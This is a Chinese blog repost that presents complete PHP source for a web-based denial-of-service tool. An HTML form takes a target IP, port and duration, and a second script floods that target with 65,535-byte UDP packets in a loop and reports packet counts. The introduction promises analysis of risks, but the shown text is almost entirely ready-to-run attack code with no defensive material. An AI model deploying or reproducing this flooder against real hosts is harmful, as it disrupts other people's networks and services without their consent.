本文提供了一个使用PHP实现的DoS攻击示例代码,并对其进行了详细解析,包括攻击代码的工作原理、关键部分注释及潜在风险。代码通过获取用户输入的IP地址、端口号和攻击持续时间,然后不断发送UDP数据包到指定地址,以达到拒绝服务的目的。
index.php <?php $ip = $_SERVER['REMOTE_ADDR']; ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="author" content=""> <title>PHP DoS, Coded by EXE</title> </head> <!-- PHP DOS, coded by EXE --> <style type="text/css"> <!-- body { font-family: Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal; line-height: normal; color: #FFFFFF; background-color: #000000; } --> </style> <!-- PHP DOS, coded by EXE --> <body> <center><br><br> <br> <b>你的 IP:</b> <font color="red"><?php echo $ip; ?></font> (请勿以你的ip作为攻击目标)<br> <br> <form name="input" action="function.php" method="post"> IP: <input type="text" name="ip" size="15" maxlength="15" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"> Time: <input type="text" name="time" size="14" maxlength="20" value = "时间(单位秒)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"> Port: <input type="text" name="port" size="5" maxlength="5" value = "端口" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"> <br><br> <input type="submit" value=" 开始攻击---> "> <br><br> <center> 发起DOS攻击后,请等待浏览器加载 </center> </form> </center> <!-- PHP DOS, coded by EXE --> </body> </html> function.php <?php $packets = 0; $ip = $_POST['ip']; $rand = $_POST['port']; set_time_limit(0); ignore_user_abort(FALSE); $exec_time = $_POST['time']; $time = time(); print "Flooded: $ip on port $rand <br><br>"; $max_time = $time+$exec_time; for($i=0;$i<65535;$i++){ $out .= "X"; } while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n"; ?>
转载于:https://www.cnblogs.com/mrjim/archive/2011/08/02/4475227.html
扫一扫
167
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
